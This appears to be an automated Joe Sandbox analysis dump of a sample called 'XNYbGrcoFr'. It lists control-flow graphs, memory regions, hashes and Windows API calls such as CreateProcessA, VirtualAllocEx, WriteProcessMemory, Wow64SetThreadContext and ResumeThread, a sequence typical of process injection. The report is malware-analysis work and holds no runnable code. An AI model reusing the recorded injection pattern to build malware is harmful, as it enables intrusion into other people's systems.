                                                  control_flow_graph 58 6a179c8-6a17a5d 60 6a17a96-6a17ab6 58->60 61 6a17a5f-6a17a69 58->61 68 6a17ab8-6a17ac2 60->68 69 6a17aef-6a17b1e 60->69 61->60 62 6a17a6b-6a17a6d 61->62 63 6a17a90-6a17a93 62->63 64 6a17a6f-6a17a79 62->64 63->60 66 6a17a7b 64->66 67 6a17a7d-6a17a8c 64->67 66->67 67->67 70 6a17a8e 67->70 68->69 71 6a17ac4-6a17ac6 68->71 75 6a17b20-6a17b2a 69->75 76 6a17b57-6a17c11 CreateProcessA 69->76 70->63 73 6a17ae9-6a17aec 71->73 74 6a17ac8-6a17ad2 71->74 73->69 77 6a17ad4 74->77 78 6a17ad6-6a17ae5 74->78 75->76 80 6a17b2c-6a17b2e 75->80 89 6a17c13-6a17c19 76->89 90 6a17c1a-6a17ca0 76->90 77->78 78->78 79 6a17ae7 78->79 79->73 81 6a17b51-6a17b54 80->81 82 6a17b30-6a17b3a 80->82 81->76 84 6a17b3c 82->84 85 6a17b3e-6a17b4d 82->85 84->85 85->85 87 6a17b4f 85->87 87->81 89->90 100 6a17cb0-6a17cb4 90->100 101 6a17ca2-6a17ca6 90->101 103 6a17cc4-6a17cc8 100->103 104 6a17cb6-6a17cba 100->104 101->100 102 6a17ca8 101->102 102->100 106 6a17cd8-6a17cdc 103->106 107 6a17cca-6a17cce 103->107 104->103 105 6a17cbc 104->105 105->103 108 6a17cee-6a17cf5 106->108 109 6a17cde-6a17ce4 106->109 107->106 110 6a17cd0 107->110 111 6a17cf7-6a17d06 108->111 112 6a17d0c 108->112 109->108 110->106 111->112 114 6a17d0d 112->114 114->114
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A17BFE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 1fa6c5b7d6fd14f5f0702baba5df5f291e8fc1632199e63d942b13828f7ac01d
                                                  • Instruction ID: f55a8885f0062433528def6b663031ccbb5e7865a74bcc7f6a980083a3376a70
                                                  • Opcode Fuzzy Hash: 1fa6c5b7d6fd14f5f0702baba5df5f291e8fc1632199e63d942b13828f7ac01d
                                                  • Instruction Fuzzy Hash: F3914C71D00619CFEB61DF69C8417EEBBB2BF48310F1485A9E809AB240DB749A85CF91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 115 273ae30-273ae3f 116 273ae41-273ae4e call 2739838 115->116 117 273ae6b-273ae6f 115->117 124 273ae50 116->124 125 273ae64 116->125 118 273ae83-273aec4 117->118 119 273ae71-273ae7b 117->119 126 273aed1-273aedf 118->126 127 273aec6-273aece 118->127 119->118 170 273ae56 call 273b0c3 124->170 171 273ae56 call 273b0c8 124->171 125->117 128 273af03-273af05 126->128 129 273aee1-273aee6 126->129 127->126 131 273af08-273af0f 128->131 132 273aef1 129->132 133 273aee8-273aeef call 273a814 129->133 130 273ae5c-273ae5e 130->125 134 273afa0-273b060 130->134 135 273af11-273af19 131->135 136 273af1c-273af23 131->136 138 273aef3-273af01 132->138 133->138 165 273b062-273b065 134->165 166 273b068-273b093 GetModuleHandleW 134->166 135->136 139 273af30-273af39 call 273a824 136->139 140 273af25-273af2d 136->140 138->131 146 273af46-273af4b 139->146 147 273af3b-273af43 139->147 140->139 148 273af69-273af6d 146->148 149 273af4d-273af54 146->149 147->146 152 273af73-273af76 148->152 149->148 151 273af56-273af66 call 273a834 call 273a844 149->151 151->148 155 273af99-273af9f 152->155 156 273af78-273af96 152->156 156->155 165->166 167 273b095-273b09b 166->167 168 273b09c-273b0b0 166->168 167->168 170->130 171->130
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B086
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 8eb1f7abe544baddcdaab53a0c67fee3ad0b2b951391df29ed79766caa7fb67b
                                                  • Instruction ID: 47ddeb52ddf92dcc0b6fa1f116dd5fd01578ec9bd87b53952ea3605f68590652
                                                  • Opcode Fuzzy Hash: 8eb1f7abe544baddcdaab53a0c67fee3ad0b2b951391df29ed79766caa7fb67b
                                                  • Instruction Fuzzy Hash: B27113B0A00B068FDB25DF29D14575ABBF2FF88704F00892DD48AD7A51DB75E845CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 273449c-27359d9 CreateActCtxA 175 27359e2-2735a3c 172->175 176 27359db-27359e1 172->176 183 2735a4b-2735a4f 175->183 184 2735a3e-2735a41 175->184 176->175 185 2735a51-2735a5d 183->185 186 2735a60 183->186 184->183 185->186 188 2735a61 186->188 188->188
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: da2dc4e65f5271ca91599da29b888b03cb0341ed234ae46d6e0d2b6122a825db
                                                  • Instruction ID: a3f81a43457d192ce0ed14f1ea25cdba9db2684850207eded462e538855d050a
                                                  • Opcode Fuzzy Hash: da2dc4e65f5271ca91599da29b888b03cb0341ed234ae46d6e0d2b6122a825db
                                                  • Instruction Fuzzy Hash: 7941F3B0C0071DCBEB25CFA9C98478EBBF5BF48704F60806AD408AB251DBB56945CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 189 2735910 190 273591c-27359d9 CreateActCtxA 189->190 192 27359e2-2735a3c 190->192 193 27359db-27359e1 190->193 200 2735a4b-2735a4f 192->200 201 2735a3e-2735a41 192->201 193->192 202 2735a51-2735a5d 200->202 203 2735a60 200->203 201->200 202->203 205 2735a61 203->205 205->205
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 0d9e697e36c12db19ddab084583475e6ebeba93ab3f8f48dc827d2d405800b7b
                                                  • Instruction ID: 4ec3a6be996480bbea8b561bf975dcaf186f60c7a2863aa053e17e28f8c33dbe
                                                  • Opcode Fuzzy Hash: 0d9e697e36c12db19ddab084583475e6ebeba93ab3f8f48dc827d2d405800b7b
                                                  • Instruction Fuzzy Hash: AE41E2B0D0071DCBEB25CFA9C98478DBBF5BF48704F60856AD408AB251DBB56945CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 206 6a17340-6a1738e 208 6a17390-6a1739c 206->208 209 6a1739e-6a173dd WriteProcessMemory 206->209 208->209 211 6a173e6-6a17416 209->211 212 6a173df-6a173e5 209->212 212->211
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A173D0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: e6d4f8ec02cea7ac981c9d0d4208db5d593b51f8fc040b410198d74a5fc89410
                                                  • Instruction ID: 20ea6b6a6c9fe273d033deace7a69894b7d71358e57c70cc7a3661e0002dd0d2
                                                  • Opcode Fuzzy Hash: e6d4f8ec02cea7ac981c9d0d4208db5d593b51f8fc040b410198d74a5fc89410
                                                  • Instruction Fuzzy Hash: 072115759003499FDB10DFA9C885BDEBBF5BF48310F108429E918A7240C7789954CBA4

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 216 6a17338-6a1738e 218 6a17390-6a1739c 216->218 219 6a1739e-6a173dd WriteProcessMemory 216->219 218->219 221 6a173e6-6a17416 219->221 222 6a173df-6a173e5 219->222 222->221
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A173D0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: b875a038d5c9b8f9a999fcfa5e571a33de6f412287e7047f4e131eeedba07323
                                                  • Instruction ID: 1f8bd7c27e5c1a9c9da32c20277bfb05d1bb5f23a8e5a65980e96cddd30ca81d
                                                  • Opcode Fuzzy Hash: b875a038d5c9b8f9a999fcfa5e571a33de6f412287e7047f4e131eeedba07323
                                                  • Instruction Fuzzy Hash: 28212676900349CFDF10DFA9C9817EEBBF5BF48310F10842AE959A7240C7789555CB64

                                                  Control-flow Graph

                                                  control_flow_graph 226 273c9a0-273d394 DuplicateHandle 228 273d396-273d39c 226->228 229 273d39d-273d3ba 226->229 228->229
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0273D2C6,?,?,?,?,?), ref: 0273D387
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: b1497f362c351c8fa98314542bbd5dd9f823e745044b96c69906d9b1cdef5acf
                                                  • Instruction ID: 58308f626d8102c2fe463b49d8c8651d23a808a355b0374f25850d23c0ae4725
                                                  • Opcode Fuzzy Hash: b1497f362c351c8fa98314542bbd5dd9f823e745044b96c69906d9b1cdef5acf
                                                  • Instruction Fuzzy Hash: 1E2105B5900308DFDB10CF9AD984ADEBBF4FB48310F10801AE914A3310D378A954CFA0

                                                  Control-flow Graph

                                                  control_flow_graph 252 6a17428-6a174bd ReadProcessMemory 255 6a174c6-6a174f6 252->255 256 6a174bf-6a174c5 252->256 256->255
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A174B0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 2960a0736ba572b6ff8f242566241de94d2f6602350361ffc5ede13bf7041b46
                                                  • Instruction ID: 79e3faa01a875d314e0320dce3727336b8c30dc8b35e1546b2e8784c8031a8f8
                                                  • Opcode Fuzzy Hash: 2960a0736ba572b6ff8f242566241de94d2f6602350361ffc5ede13bf7041b46
                                                  • Instruction Fuzzy Hash: 282123B18003498FDB10CFA9C880BEEBBF5BF48310F10842AE559A7240CB789910CBA0

                                                  Control-flow Graph

                                                  control_flow_graph 260 6a17430-6a174bd ReadProcessMemory 263 6a174c6-6a174f6 260->263 264 6a174bf-6a174c5 260->264 264->263
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A174B0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: a8045c3420cd34574418e2d34a59a1fd92be1dcd357db5e3d8799cc0dc9c9dff
                                                  • Instruction ID: 95c24818ae4c38f7250f93e1ec1fe03278d7a6cf735dc3ac05d8046b08dd778f
                                                  • Opcode Fuzzy Hash: a8045c3420cd34574418e2d34a59a1fd92be1dcd357db5e3d8799cc0dc9c9dff
                                                  • Instruction Fuzzy Hash: 0E2116B18003499FDB10DFAAC881ADEBBF5FF48310F108429E518A7240C7789950CBA5

                                                  Control-flow Graph

                                                  control_flow_graph 232 6a16d68-6a16dbb 234 6a16dcb-6a16dfb Wow64SetThreadContext 232->234 235 6a16dbd-6a16dc9 232->235 237 6a16e04-6a16e34 234->237 238 6a16dfd-6a16e03 234->238 235->234 238->237
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A16DEE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: bebfd0dbbcaefefcb961791c96c01ab6c8000e31b298ff8c1688e6dcba9c2a9b
                                                  • Instruction ID: f6fee6f2d315ec8e5daab4f8dc97ea5bba2721ff0cd36d899d8dcb44fe2814c7
                                                  • Opcode Fuzzy Hash: bebfd0dbbcaefefcb961791c96c01ab6c8000e31b298ff8c1688e6dcba9c2a9b
                                                  • Instruction Fuzzy Hash: AE215475900309CFEB50DFA9C5807EEBBF5AF88324F24842AD559AB240CB789945CFA0

                                                  Control-flow Graph

                                                  control_flow_graph 242 6a16d70-6a16dbb 244 6a16dcb-6a16dfb Wow64SetThreadContext 242->244 245 6a16dbd-6a16dc9 242->245 247 6a16e04-6a16e34 244->247 248 6a16dfd-6a16e03 244->248 245->244 248->247
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A16DEE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: cfe7eba2b7c26153860c274043ffdbad8a22b9e3b4859485c0334af5e2660f61
                                                  • Instruction ID: 2a2a4493f0fdc397b28a7df799d9efee600327208c60537e20d5c6b3c85c3213
                                                  • Opcode Fuzzy Hash: cfe7eba2b7c26153860c274043ffdbad8a22b9e3b4859485c0334af5e2660f61
                                                  • Instruction Fuzzy Hash: 25213871D007098FDB50DFAAC4857AEBBF4AF88324F148429D519AB240CB789944CFA5

                                                  Control-flow Graph

                                                  control_flow_graph 268 6a17278-6a172fb VirtualAllocEx 273 6a17304-6a17329 268->273 274 6a172fd-6a17303 268->274 274->273
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A172EE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 52ba5b60fd77001e8a7a8e119fca25e23e0fb4891c091d79732d11e1b7396709
                                                  • Instruction ID: 8d29359e6ceb1f24279c45f9de607553e688c922fe23c79c19fb34f72378a50e
                                                  • Opcode Fuzzy Hash: 52ba5b60fd77001e8a7a8e119fca25e23e0fb4891c091d79732d11e1b7396709
                                                  • Instruction Fuzzy Hash: 912124759002499BDB10DFAAC9446DEBBF6AB88324F20841AE919AB250CB799511CFA0

                                                  Control-flow Graph

                                                  control_flow_graph 278 273a870-273b2e8 280 273b2f0-273b31f LoadLibraryExW 278->280 281 273b2ea-273b2ed 278->281 282 273b321-273b327 280->282 283 273b328-273b345 280->283 281->280 282->283
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0273B101,00000800,00000000,00000000), ref: 0273B312
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: e4c5560d5f27842a3beab78a0ba9894be9ea4f9d88c097f1cee7195a7b0c233b
                                                  • Instruction ID: d3883c268f1885d0d0d36166e5c92e87b672091d9ef6940a3f3b418307d8c299
                                                  • Opcode Fuzzy Hash: e4c5560d5f27842a3beab78a0ba9894be9ea4f9d88c097f1cee7195a7b0c233b
                                                  • Instruction Fuzzy Hash: 461114B69003499FDB10CF9AC544A9FFBF4FF88324F10852AE919A7201C3B5A544CFA0

                                                  Control-flow Graph

                                                  control_flow_graph 286 6a17280-6a172fb VirtualAllocEx 289 6a17304-6a17329 286->289 290 6a172fd-6a17303 286->290 290->289
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A172EE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 4bb5045782e3d6e81a8ac573937dd9a070df0f94a70252a9e09c6e33a7982746
                                                  • Instruction ID: 997faa90b6b25d2748fdf2d2a38d64344aa7c60e19a57ba752e4ad5fef34a88e
                                                  • Opcode Fuzzy Hash: 4bb5045782e3d6e81a8ac573937dd9a070df0f94a70252a9e09c6e33a7982746
                                                  • Instruction Fuzzy Hash: 781156768003499FDF10DFAAC844BDEBBF5AF88320F108419E519AB250C779A510CFA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: afce0ae5a6b1fa4d06c2166de9624ccc66fb2a4cf250931a7e3ebb98b4117e4a
                                                  • Instruction ID: 2d6edd7f8d3836d109d0898dcbb882e652a68ef076a36d32f827d00895673aa7
                                                  • Opcode Fuzzy Hash: afce0ae5a6b1fa4d06c2166de9624ccc66fb2a4cf250931a7e3ebb98b4117e4a
                                                  • Instruction Fuzzy Hash: 39115BB19007498FDB20DFA9C4857EEFBF4EF88324F248419D519A7240C7796504CF94
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0273B101,00000800,00000000,00000000), ref: 0273B312
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 2e38f6325d12ef6f8110127470220ec9a0d3e38db22a63598c64ff75e239d198
                                                  • Instruction ID: 433c2613629ce15a4a04ef58baa03b383c7e606d4df3298d621c31892e1f6e8b
                                                  • Opcode Fuzzy Hash: 2e38f6325d12ef6f8110127470220ec9a0d3e38db22a63598c64ff75e239d198
                                                  • Instruction Fuzzy Hash: 691120B6900309CFDB14CF9AD584ADEFBF5FB88324F10842AD519A7200C3B8A549CFA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: d8d39ef38065192c85af0f0759f87d04902096822d589a471bf516fd77d93021
                                                  • Instruction ID: d143e95488d87c27a11537a33c6b3ea7e429cad7e1441d84ff6214ce0ac93ac7
                                                  • Opcode Fuzzy Hash: d8d39ef38065192c85af0f0759f87d04902096822d589a471bf516fd77d93021
                                                  • Instruction Fuzzy Hash: FF1136B1D007498FDB20DFAAC84579EFBF8AF88724F248419D519A7240CB79A944CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A1B01D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: e33b099be2e2eb28d8e05cf9735c8c1d00e990846af5456048b33f79bf9bc7ff
                                                  • Instruction ID: f891dd07e722d06f9d2ccb4aae18efebc6644ad92ad3f536cc98d90e83fd7359
                                                  • Opcode Fuzzy Hash: e33b099be2e2eb28d8e05cf9735c8c1d00e990846af5456048b33f79bf9bc7ff
                                                  • Instruction Fuzzy Hash: A11103B5800749DFDB50DF9AC988BDEBBF8FB48724F108419E568A7210C3B5A944CFA5
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B086
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: c3c2878102ed7a2207b77aeae15450bd589a04ee5b761dd4e76cf6e13eb54202
                                                  • Instruction ID: 4e7e293309e93b051b791406d37b95365239f0ba884e24bf6309af032d02a672
                                                  • Opcode Fuzzy Hash: c3c2878102ed7a2207b77aeae15450bd589a04ee5b761dd4e76cf6e13eb54202
                                                  • Instruction Fuzzy Hash: FF110FB6C007498FCB20CF9AC544B9EFBF4FB88628F10842AD428A7210C379A545CFA1
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A1B01D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 6cd6adc7f6b3af1e9b59b37d8b29505ec8b6489670196b669d500114c6f8a8ac
                                                  • Instruction ID: 4377519282d91d649fce6d6841e5d4335d590be2618836e6999de241244caffc
                                                  • Opcode Fuzzy Hash: 6cd6adc7f6b3af1e9b59b37d8b29505ec8b6489670196b669d500114c6f8a8ac
                                                  • Instruction Fuzzy Hash: 141122B58003499FCB10DF99D984BDEBFF8EB48320F108409E558A7210C375AA44CFA1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf8ec5fa235798e7b1a20ece3dbd5437318375c5f85a5629d737ea7452340e55
                                                  • Instruction ID: 7a551959d513739988dde512c4f5685747e904965131c27d70bf25e8300fde72
                                                  • Opcode Fuzzy Hash: bf8ec5fa235798e7b1a20ece3dbd5437318375c5f85a5629d737ea7452340e55
                                                  • Instruction Fuzzy Hash: EF21FF75A04200EFDF14EF24D984B26BFA1EB84318F20C56AD90A0B356C37AD447CE61
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 006c918f3bff5692ffbcff57616a6e65a1d49b3f984bc54432103c68897dbfe8
                                                  • Instruction ID: 3ed462949a1e569179858ebe2e0cd3b126fa82a88b278e63efc1624413a4af78
                                                  • Opcode Fuzzy Hash: 006c918f3bff5692ffbcff57616a6e65a1d49b3f984bc54432103c68897dbfe8
                                                  • Instruction Fuzzy Hash: 1021CF75904204EFDF05EF14D980B26BFA5FB88314F20C56EE90A4F292C776D446CA61
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ea2232efd025f794ab9795d0a970bd8dd66190c196cca474210469d46a6247b
                                                  • Instruction ID: ef7455b2996e3cf3532e140bd0fd796c5343b094e48e82358b8b255586084c14
                                                  • Opcode Fuzzy Hash: 6ea2232efd025f794ab9795d0a970bd8dd66190c196cca474210469d46a6247b
                                                  • Instruction Fuzzy Hash: 3C218E755093C0CFDB06DF24D994716BF71EB46218F28C5DBD8498B2A7C33A980ACB62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction ID: c301cbffb35e81779f06a5b331a4bcd5312667bf394ebd226b80945e96b1c3a4
                                                  • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction Fuzzy Hash: 23118B75904284DFCB15DF10D6C4B16BFA1FB84218F24C6AAD8494F7A6C33AD44ACB61
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165291242.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_248d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c25301867199c1f798f9064842ee7617c4c67de8ebf19af0407661a307b7015
                                                  • Instruction ID: d9b72fda34b9cd3f90b98b4c12a88288d88039d1a96db9188a5deca9637cfd07
                                                  • Opcode Fuzzy Hash: 4c25301867199c1f798f9064842ee7617c4c67de8ebf19af0407661a307b7015
                                                  • Instruction Fuzzy Hash: FB012B75816B44DAE7106E35CDC4B2FBF98DF41364F08C51BEE094A2C6C7B99481CA71
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165291242.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
